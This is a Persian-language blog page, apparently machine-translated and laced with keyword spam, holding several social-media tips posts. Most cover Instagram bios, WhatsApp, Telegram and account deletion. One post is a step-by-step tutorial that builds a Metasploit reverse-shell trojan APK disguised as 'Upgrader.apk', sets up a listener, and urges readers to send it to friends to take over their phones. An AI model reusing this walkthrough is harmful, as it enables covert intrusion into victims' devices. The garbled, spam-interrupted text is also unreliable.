Instagram Hacks # 3: تراز بندی مناسب بیوگرافی خود را پیدا کنید
چند روش برای برجسته سازی بیوگرافی اینستاگرام شما وجود دارد و تراز یا فاصله مناسب برای بیو می تواند تفاوت ایجاد کند.

برای درست شدن این ممکن است آزمون و خطایی انجام شود ، اما نتایج یک بیوگرافی چشم نواز است که واقعاً برجسته است!

Instagram-Hacks
بخاطر بسپارید: شما فقط 150 نویسه برای بیوگرافی اینستاگرام خود دارید ، بنابراین مراقب باشید برای پیام رسانی نام تجاری خود سازش نکنید تا تراز خود را درست انجام دهید.

نحوه تغییر ترازبندی یا افزودن فضاها به بیوگرافی اینستاگرام خود:

حساب اینستاگرام خود را در یک مرورگر وب باز کنید. (این هک اینستاگرام را می توان در برنامه تلفن همراه انجام داد ، اما در نسخه دسک تاپ بسیار ساده تر است)
فاصله بین فلش ها را کپی کنید (مطمئن شوید که از فضای بین پیکان ها کپی می کنید نه خود پیکان ها!): >> ⠀⠀⠀⠀⠀⠀⠀⠀⠀ <<
روی دکمه "ویرایش نمایه خود" از صفحه نمایه خود در اینستاگرام ضربه بزنید
به قسمت متن "Bio" بروید و فضاهایی را که در بالا کپی کرده اید قبل از هر خط متن جای گذاری کنید. اگر متن شما کاملاً متمرکز نیست ، همیشه می توانید فضاها را اضافه یا حذف کنید تا به یک تراز مناسب برسید!
Instagram Hacks # 4: نویسه های خاص را به نام یا عنوان بیوگرافی خود اضافه کنید
تا به حال فکر کرده اید که چگونه برخی از پروفایل های اینستاگرام این شخصیت های خاص زیبا مانند خورشید ، ستاره و مداد را در بیوگرافی اینستاگرام خود دارند؟

Instagram Hacks: شخصیت های خاص
باور کنید یا نه ، این همان شکلک های اصلی هستند که می توانید در برنامه های پردازش کلمه خود مانند Word یا Google Docs پیدا کنید!

در اینجا نحوه استفاده از نویسه های خاص در Instagram bio خود با استفاده از Microsoft Word آورده شده است:

سند Word را باز کنیدربات ایستاگرام
بیوگرافی خود را تایپ کنید و در جایی که می خواهید یک شخصیت خاص قرار دهید ، به بخش "درج" و "نماد پیشرفته" بروید
در اینجا می توانید نمادهایی را که می خواهید اضافه کنید ، مانند علائم زودیاک یا فلش ، مرور کنید. Wingdings ، Wingdings 2 و Wingdings 3 از منوی کشویی بیشترین نماد را برای انتخاب دارند
نمادها را در جایی که می خواهید در بیوگرافی خود اضافه کنید
حساب Instagram خود را روی دسک تاپ خود باز کنید و به "ویرایش نمایه" برویدربات ایستاگرام
بیوگرافی خود را از سند Word به بیوگرافی اینستاگرام خود کپی و جایگذاری کنید و پس از اتمام روی «تمام شد» ضربه بزنید.
Instagram Hacks # 5: در نتایج جستجوی بیشتر در صفحه کاوش ظاهر شوید
آیا می دانید قسمت "Name" در بیوگرافی اینستاگرام شما قابل جستجو است؟

این بدان معنی است که می توانید آن را به کلماتی تغییر دهید که نمایه یا تجارت اینستاگرام شما را برجسته می کند.ربات ایستاگرام

با قرار دادن کلمات کلیدی مهم در قسمت نام خود ، اگر کسی آن کلمات کلیدی را جستجو کند ، احتمال حضور در صفحه کاوش Instagram بیشتر خواهد شد!

Instagram-Hacksربات ایستاگرام
Instagram Hacks # 6: خوراک اینستاگرام خود را به یک صفحه وب قابل خرید تبدیل کنید
اگر از اینکه نمی توانید از اینستاگرام ارتباط برقرار کنید ناامید می شوید ، تنها نیستید!ربات ایستاگرام

به همین دلیل بعداً راه حل ارائه شد که به شما امکان می دهد از اینستاگرام بازدید بیشتری داشته باشید: Linkin.bio!

با استفاده از Linkin.bio می توانید پست های اینستاگرام خود را با هر پیوندی که می خواهید برچسب گذاری کنید (به صفحات محصول ، مقالات و پست های وبلاگ فکر کنید!) تا خبرمایه خود را به یک صفحه فرود با کلیک و بهینه سازی شده تبدیل کنید.ربات ایستاگرام

https://choobingroup.ir/product/%d8%b3%d8%a7%d8%ae%d8%aa-%d8%b1%d8%a8%d8%a7%d8%aa-%d8%a7%db%8c%d9%86%d8%b3%d8%aa%d8%a7%da%af%d8%b1%d8%a7%d9%85-%d8%a8%d8%a7-%d8%b3%db%8c-%d8%b4%d8%a7%d8%b1%d9%be/

khodam بازدید : 45 1400/03/22 زمان : 22:04 نظرات (0)

سلام هکرها! به پست دوم من خوش آمدید:
این یک آموزش است که نحوه هک کردن تلفن های اندرویدی با کالی را توضیح می دهد.
من نمی توانم هیچ آموزشی را در مورد توضیح این Hack / Exploit ببینم ، بنابراین ، من یکی از آنها را درست کردم.
(هنوز هم ، ممکن است شما قبلاً در مورد این موضوع بدانید) اندروید

مرحله 1: آتش سوزی کالی:
یک ترمینال را باز کنید و یک Trojan .apk ایجاد کنیداندروید
این کار را می توانید با تایپ کردن انجام دهید:
msfpayload android / meterpreter / reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk (LHOST را با IP خود جایگزین کنید)
همچنین می توانید با استفاده از IP عمومی / خارجی خود در LHOST و با انتقال پورت ، اندروید را روی WAN یعنی از طریق Interet هک کنید (اگر در قسمت نظر در مورد مشکلی دارید از من در مورد انتقال پورت س askال کنید)

مرحله 2 ترمینال دیگری را باز کنید:
ترمینال دیگری را باز کنید تا پرونده تولید شود.
با تایپ کردن: msfconsole ، کنسول metasploit را بارگیری کنیداندروید

مرحله 3 تنظیم یک شنونده:اندروید
پس از بارگیری (به زمان نیاز دارد) ، سو multi استفاده multi-handler را با تایپ بارگیری کنید: use exploit / multi / handler

بارگیری (معکوس) را با تایپ کردن تنظیم کنید: android / meterpreter / reverse_tcp payload را تنظیم کنید
برای تنظیم نوع میزبان L: LHOST 192.168.0.4 را تنظیم کنید (حتی اگر در WAN هک می کنید IP خصوصی / داخلی خود را در اینجا وارد کنید نه عمومی / خارجی)

بهره برداری!
در آخر نوع: برای شروع شنونده سو explo استفاده کنید.
برنامه ای که ایجاد کرده اید (Upgrader.apk) را از پوشه اصلی در تلفن Android خود کپی کنید.اندروید

سپس با استفاده از بارگذاری آن به Dropbox یا هر وب سایت اشتراکی (مانند: www.speedyshare.com) آن را ارسال کنید.
سپس پیوندی را که وب سایت به شما داده است برای دوستان خود ارسال کنید و از تلفن های آنها بهره برداری کنید (فقط در شبکه LAN ، اما اگر از روش WAN استفاده کردید می توانید از اکسپلویت در هر جای اینترنت استفاده کنید)

به قربانی اجازه دهید برنامه Upgrader را نصب کند (همانطور که فکر می کند منظور ارتقا some برخی ویژگی ها در تلفنش است)
با این حال ، گزینه مجاز نصب برنامه ها از منابع ناشناخته باید (در صورت عدم وجود) از تنظیمات امنیتی تلفن اندرویدی فعال شود تا به Trojan اجازه نصب داده شود.
و وقتی او روی Open کلیک می کند ...
مرحله 5BOOM!
سریع متر متر وجود دارد:اندروید


------------------------------------------ هک ------- ------------------------------------------

پایان:
مدام بیشتر بیایید!
برخی از ماژول های ارسال که برای ویندوز کار می کنند ممکن است در android کار نکننداندروید
برای مثال: اجرای killav ، پایداری (درپشتی مداوم) و غیره

متشکرم!اندروید

khodam بازدید : 38 1400/03/22 زمان : 21:56 نظرات (0)

چرا کرک برنامه ای؟ 🔗


بعضی اوقات دوست دارم بررسی کنم آیا سرویس های آنلاین که استفاده می کنم واقعاً ایمن هستند یا خیر. من موارد زیادی را ارائه داده ام تا ثابت کنم که اغلب اینگونه نیستند. بیشتر من می توانم از تکنیک های بسیار ساده برای بررسی امنیت استفاده کنم زیرا بسیاری از آسیب پذیری های اساسی امنیتی وجود دارد. وقتی نوبت به برنامه ها می رسد ، من اغلب از پروکسی HTTP مانند چارلز برای نگاهی به ترافیک HTTP و HTTPS استفاده می کنم. با این حال ، هر چند وقت یکبار برنامه هایی وجود دارند که از تونل سازی HTTP یا پین کردن گواهی. در این موارد شما باید یک قدم جلو بروید تا بتوانید به ترافیک شبکه گوش دهید. آموزش اینستاگرام

دلایل دیگر برای عدم کامپایل برنامه ها می تواند بازیابی کد منبع از دست رفته ، تزریق ترجمه های زبان یا حتی رفع اشکال باشد. اما هی ، به یاد داشته باش ، هر کاری را که مجاز به آن نیستی انجام نده. قانون را زیر پا نگذارید. این راهنما فقط برای اهداف آموزشی است که شما دلایل موجهی برای انجام آنچه انجام می دهید داشته باشید.

مطالب


اینها موضوعاتی است که من آنها را بیان خواهم کرد.

گزینه های آنلاین
گرفتن ابزارها
دریافت APK
رفع کامپایل برنامه
تغییر برنامه
گرفتن برنامه با هم
گزینه های آنلاین
خیلی اوقات مجبور نیستید دستان خود را خیلی کثیف کنید و دست یک برنامه غیر کامپایل شده را بگیرید. برخی از خدمات خوب وجود دارد که می تواند اکثر APK های Android را برای شما فراهم کند و سپس حتی برخی از آنها را از حالت کامپایل خارج کنید.

سریع دانلود apk با استفاده از All-In-On Downloader


برای به دست آوردن یک APK معمولاً می توانید نام بسته را در گوگل جستجو کنید. تعداد کمی سایت برای بارگیری آنها وجود دارد. بعضی از آنها بیشتر از بقیه به روز می شوند. توجه داشته باشید که می توانید نسخه های مختلف و APK را برای سیستم عامل های مختلف معماری بدست آورید.

یک کلمه خرد: برخی از APK های تصادفی را بارگیری و اجرا نکنید (حداقل این کار را در یک محوطه ماسه ای و / یا یک محیط شبیه سازی شده انجام دهید). تعداد کمی سایت وجود دارد که APK جعلی یا تغییر یافته را ارائه می دهد. این برنامه ممکن است خوب به نظر برسد ، اما هنوز برخی از بدافزارها تزریق شده است. کورکورانه به آنهایی که توصیه می کنم اعتماد نکنید. اگر APK با همان کلیدی که APK از فروشگاه Play دریافت کرده اید امضا شده باشد ، باید بتوانید به اصل آن اعتماد کنید (اگرچه مواردی از کلیدهای خصوصی در طبیعت وجود داشته است (حتی APK های دوباره بسته بندی شده در وب سایت خود فروشنده بارگذاری شده اند) )

رمزگشایی آنلاین
سریعترین و ساده ترین راه برای کامپایل کردن APK فقط استفاده از یک سرویس آنلاین است. شما فقط APK را بارگذاری کرده و بایگانی با تمام منابع و پرونده های از بین رفته را دریافت می کنید. javadecompilers.com همان موردی است که من از آن استفاده کرده ام و من از آن بسیار راضی بوده ام.

همانطور که می دانید ، فایل APK در واقع فقط یک فایل ZIP است ، بنابراین می توانید به طور معمول نام آن را به .zip تغییر دهید و روی آن دوبار کلیک کنید یا unzip را اجرا کنید و می توانید شروع به بررسی برنامه کنید. اگر این یک برنامه ترکیبی است ، برای دسترسی به همه چیز مجبور نیستید به هیچ وجه از کامپایل آن استفاده کنید. در واقع ، برنامه Gator Watch یک برنامه ترکیبی بود و با کمترین تلاش همه چیز را بخشید.

گرفتن ابزار

LinkStore: A New Way To Install Cracked Apps From The App Store -  TechGreatest
Android - SDK ، ابزارها و شبیه سازها   https://choobingroup.ir 
شما باید حداقل ابزارهای Android و SDK را داشته باشید ، اما برای اکثر افراد توصیه می کنم فقط Android Studio را نصب کنید و دستورالعمل ها را برای تنظیم عادی آن دنبال کنید (اما مواردی مانند SDK را برای Android TV و سایر مواردی که کند می شوند کنار بگذارید پایین بارگیری کنید).

Apktool - تجزیه و جمع آوری APK ها
Apktool را می توان به صورت دستی نصب کرد ، یا اگر از طریق مدیر بسته خود در دسترس است می توانید با استفاده از فرمانی مانند apt-get install apktool آن را نصب کنید.

دریافت APK

Hack in App Purchases With Lucky Patcher
اولین قدم مهندسی معکوس گرفتن APK است. من از برنامه Android Developer Tools خودم به عنوان یک برنامه نمونه استفاده خواهم کرد. این منبع آزاد است و در صورت تمایل می توانید کد منبع و APK ها را از GitHub دریافت کنید.

ابزار خط فرمان adb (Android Debug Bridge) برای کلیه ارتباطات با دستگاه یا شبیه ساز استفاده می شود. این ابزار را می توانید در پوشه نصب Android-platform-tools بیابید.

توجه داشته باشید در مورد Bundles App / multi-APK
به طور فزاینده ای رایج است (و برای نسخه های Play Store در نیمه دوم سال 2021 لازم است) که برنامه ها از Android App Bundles استفاده می کنند. این باعث ایجاد یک پیچیدگی در هنگام شکستن برنامه ها می شود.

هنگامی که برنامه یک بسته نرم افزاری است ، در مثال فوق بیش از یک فایل APK مشاهده خواهید کرد. به طور معمول base.apk (کد مشترک) ، split_config.arm64_v8a.apk (پیکربندی برای معماری CPU) ، split_config.xxxhdpi.apk (پیکربندی برای وضوح صفحه) و به طور معمول split برای زبان و شاید برخی از ویژگی های پویا را مشاهده خواهید کرد. .

شما باید همه پرونده های APK را کپی کنید - یا در دستورات جداگانه adb pull یا کل فهرست برنامه را بکشید.

khodam بازدید : 28 1399/12/10 زمان : 9:58 نظرات (0)

 

واتساپ

ما طرفداران بسیار زیادی در سرویس پیام رسانی WhatsApp هستیم. ارائه متن ، چندرسانه ای ، چندرسانه ای ، پیام صوتی رایگان و تماس صوتی و تصویری رایگان ، چه چیزی را دوست ندارید؟ این احتمال وجود دارد که شما مدتی است آن را روی تلفن خود استفاده می کنید ، اما ممکن است هیچ وقت را صرف زیر و رو کردن برای خوب بودن در سطح بعدی WhatsApp نکنید. ما برای یافتن نکات ویژه ، ترفندها ، ترفندها ، هک ها و ویژگی های مخفی ویژه آن ، کمی وقت صرف کرده ایم تا واقعاً به برنامه آن بپردازیم تا بتوانید به یک متخصص WhatsApp تبدیل شوید.

 

khodam بازدید : 24 1399/12/05 زمان : 19:25 نظرات (0)

مسنجر تلگرام با شروع به عنوان یک رقابت مناسب برای WhatsApp در سال 2003 ، از آن زمان با سرعت ثابت در حال رشد است. اخیراً ، این شرکت معیار 100 میلیون کاربر فعال ماهانه را به ثبت رسانده است. این خوب است ، اما هنوز در هیچ کجا مارک یک میلیاردی WhatsApp نیست. با این حال ، برخی از ویژگی ها آن را از برنامه های دیگر متمایز می کنند و این ویژگی ها برای نگه داشتن افرادی که از آن استفاده مذهبی می کنند کافی است. این پیام رسان فوری همچنین هر روز به تعداد زیادی کاربر اضافه می کند.

Telegram allows you to delete a received message from the sender's device

 

 

khodam بازدید : 39 1399/12/02 زمان : 22:53 نظرات (0)

نتیجه تصویری برای دیلیت اکانت اینستاگرام

امروز به شما میاموزیم، که چگونه حساب Instagram خود را برای همیشه حذف کنید. پس از پاک شدن حساب شما ، عکس ها ، فیلم ها ، دنبال کنندگان و سایر اطلاعات حساب شما پس از 30 روز برای همیشه از اینستاگرام حذف می شوند. اگر در آن دوره زمانی وارد سیستم شوید ، حساب شما دوباره فعال می شود ، اما پس از آن دیگر دیگر شانس ندارید. اگر ترجیح می دهید حساب خود را برای همیشه حذف نکنید ، می توانید در عوض آن را موقتاً غیرفعال کنید.

با موبایل

 

khodam بازدید : 28 1399/12/02 زمان : 22:15 نظرات (0)

نتیجه تصویری برای دیلیت اکانت تلگرام

Telegram یک برنامه پیام رسان جامد است که چت های شما را رمزگذاری کرده و دارای ویژگی های فراوانی است. اما اگر از تلگرام به یک برنامه پیام رسان جدید تغییر می دهید ، بهتر است قبل از شروع کار ، حساب تلگرام خود را حذف کنید. متأسفانه ، تلگرام سوئیچ مستقیمی را ارائه نمی دهد که می توانید در تنظیمات برنامه حرکت کنید. بنابراین در اینجا راهنمای گام به گام به شما نشان داده شده است که چگونه حساب تلگرام خود را غیرفعال کنید و چگونه حساب کاربری تلگرام خود را حذف کنید.

 

چرا ممکن است بخواهید حساب تلگرام خود را حذف کنید

khodam بازدید : 31 1399/12/02 زمان : 20:56 نظرات (0)

اگر قصد انتقال به تلگرام را دارید اما نگران از دست دادن سابقه چت خود هستید ، خبرهای خوبی وجود دارد. تلگرام اعلام کرده است که اکنون امکان انتقال نه تنها سابقه مکالمه شما ، بلکه همه موارد دیگر از جمله فیلم ها و فایل ها از واتس اپ (و سایر برنامه ها) به تلگرام با سهولت نسبی وجود دارد.

khodam بازدید : 45 1399/11/30 زمان : 12:45 نظرات (0)

 

نتیجه تصویری برای کنترل گوشی از طریق رایانه

 

آیا هرگز از رایانه خود استفاده کرده اید که دوستی به طور تصادفی تصمیم بگیرد زمان شروع یک مکالمه پیامکی فرا رسیده است؟ معمولاً باید کاری را که روی دسک تاپ انجام می دهید متوقف کنید ، سپس تلفن هوشمند خود را برداشته و به متن پاسخ دهید. سپس ، اگر دوست شما با پیام دیگری پاسخ دهد ، باید بین ماوس و صفحه کلید و دستگاه دستی خود به عقب و جلو حرکت کنید.

اما اگر بتوانید با باز کردن پنجره ای روی رایانه خود به همان متن پاسخ دهید ، چه می کنید؟ و اگر آن پنجره به شما امکان کنترل کامل تلفن هوشمند خود را هنگام شارژ شدن از طریق USB بدهد ، چه می کنید؟ توسعه دهنده خوب کوشیک دوتا دیده است که این سناریوی خیالی سرانجام یک واقعیت است - و از آنجا که برنامه Vysor جدید وی برای مرورگر وب Chrome کار می کند ، تقریباً با هر سیستم عامل دسکتاپ می توانید این کار را انجام دهید.

فعال کردن ADB در رایانه (فقط ویندوز)

اگر از رایانه شخصی Windows استفاده می کنید ، باید درایورهای ADB را نصب کنید. بنابراین روی این پیوند کلیک کنید تا پرونده درایور سریعاً بارگیری شود. (کاربران Mac نیازی به این کار ندارند ، بنابراین به مرحله بعدی بروید.) وقتی کار تمام شد ، ادامه دهید و آن را اجرا کنید ، سپس دستورالعمل های نصب را دنبال کنید.

khodam بازدید : 66 1399/11/30 زمان : 10:43 نظرات (0)

نتیجه تصویری برای فعال کردن اینستاگرام تجاری

با تقریباً 1 میلیارد کاربر فعال ماهانه ، اینستاگرام مدتهاست که به عنوان یک شبکه اجتماعی طبقه بندی شده طبقه بندی می شود. این یکی از محبوب ترین و سریع ترین رشد پلتفرم های رسانه های اجتماعی است و کسب و کار شما باید از آن استفاده کند. اگر هنوز این کار را نکرده اید ، وقت آن است که حساب تجاری Instagram خود را تنظیم کنید.

به اشتراک گذاشتن عکس و فیلم همان چیزی است که اینستاگرام در آن است. شما می توانید از طریق تجسم بصری گرافیکی غنی و الهام بخش در مورد تجارت و نام تجاری خود بگویید. از آنجا که سایر شبکه های اجتماعی به پست و عکس و فیلم اهمیت بیشتری می دهند ، اینستاگرام بهترین شبکه مکمل است که برای سهولت ارسال پست متقابل در مخلوط بازاریابی شما گنجانده شده است.

نحوه راه اندازی حساب تجاری اینستاگرام
قبل از شروع ، اگر حساب کاربری فیس بوک خود را از قبل راه اندازی نکرده باشید ، نمی توانید مراحل زیر را انجام دهید یا از استفاده از حساب تجاری Instagram خود استفاده کامل کنید. هنگامی که یک صفحه فیس بوک تجاری دارید ، می توانید حساب تجاری Instagram خود را ایجاد کنید.

از قبل صفحه فیس بوک تجاری دارید؟ سپس بیایید سریع وارد شویم. در اینجا یک مرحله به مرحله نحوه راه اندازی حساب کسب و کار Instagram آورده شده است.

1. برنامه را بارگیری کنید

برخلاف سایر شبکه های اجتماعی ، ارسال مطالب در اینستاگرام فقط با استفاده از برنامه تلفن همراه قابل انجام است. بنابراین مرحله 1 این است که گوشی هوشمند خود را بیرون بیاورید ، Instagram را در فروشگاه برنامه خود پیدا کنید و بارگیری کنید.

khodam بازدید : 49 1399/11/29 زمان : 22:05 نظرات (0)

12 ترفند WhatsApp که باید در مورد آنها بدانید

1- پیام را بدون تایپ ارسال کنید

GadgetsNow

کاربران WhatsApp به لطف Siri و Google Assistant می توانند بدون تایپ واقعی پیام ارسال کنند. در حالی که کاربران تلفن های هوشمند Android می توانند از Google Assistant برای ارسال پیام استفاده کنند ، کاربران iPhone می توانند با استفاده از Siri پیام ارسال کنند. این دستیارهای Digitalla می توانند پیام های WhatsApp شما را نیز برای شما بخوانند.

khodam بازدید : 36 1399/11/29 زمان : 21:19 نظرات (0)

سرعت ، امنیت و سادگی چند مورد از فضیلت هایی است که تلگرام را به یک رسانه ارتباطی بسیار عالی تبدیل می کند. صادق به جد استعاره ای خود که نام آن را نیز الهام بخشیده است ، پیام رسان کمترین میزان را دارد و انتقال پیام را به وضوح متمرکز می کند. همچنین به شما امکان می دهد رابط کاربری و همچنین تجربه کلی پیام رسانی را شخصی سازی کنید. بیش از هر چیز ، تلگرام کاملا رایگان است و هزینه مخفی آن را به صورت تهدیدی برای حریم خصوصی یا امنیت شما به همراه ندارد. چه در مورد کاهش حریم خصوصی و تجارت کثیف تبلیغات تقریباً در همه جا به اینترنت اذیت شده باشید ، یا فقط می خواهید سر و صدای چتهای همیشه واتس اپ و مسنجر فیس بوک را کاهش دهید ، تلگرام مکان خوبی برای شروع است. ما در اینجا برخی از ترفندها و نکات مسنجر تلگرام را ذکر کرده ایم که به شما کمک می کند مسنجر را بهتر بشناسید و از آن به طور موثر استفاده کنید.

1. Chat Folders

1. Chat Folders

Chat Folders یکی از بهترین ترفندهای تلگرام است که باید بدانید و حداکثر استفاده را ببرید. ما کانال ها و گروه های مختلفی را در انواع مختلف تلگرام دنبال می کنیم ، بدون ذکر چت های جداگانه. داشتن همه این چت ها در یک صفحه باعث می شود همه چیز به سختی شسته شود و منطقی باشد. بنابراین برای حل این مشکل ، تلگرام چیزی به نام "پوشه های گفتگو" را آورده است. با این کار می توانید گپ های خود را در برچسب های مختلف دسته بندی کنید و تلگرام مسائل را برای شما مرتب می کند. در نتیجه ، تلگرام فوق العاده تمیز می شود و مدیریت آن بسیار آسان تر است. 

درباره ما
در آنفالوور شما با ترفندهای شبکه های اجتماعی آشنا می شوید
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • مطالب
    آرشیو
  • 1400
  • 1399
  • آمار سایت
  • کل مطالب : 22
  • کل نظرات : 0
  • افراد آنلاین : 2
  • تعداد اعضا : 0
  • آی پی امروز : 7
  • آی پی دیروز : 1
  • بازدید امروز : 16
  • باردید دیروز : 3
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 29
  • بازدید ماه : 110
  • بازدید سال : 742
  • بازدید کلی : 3,042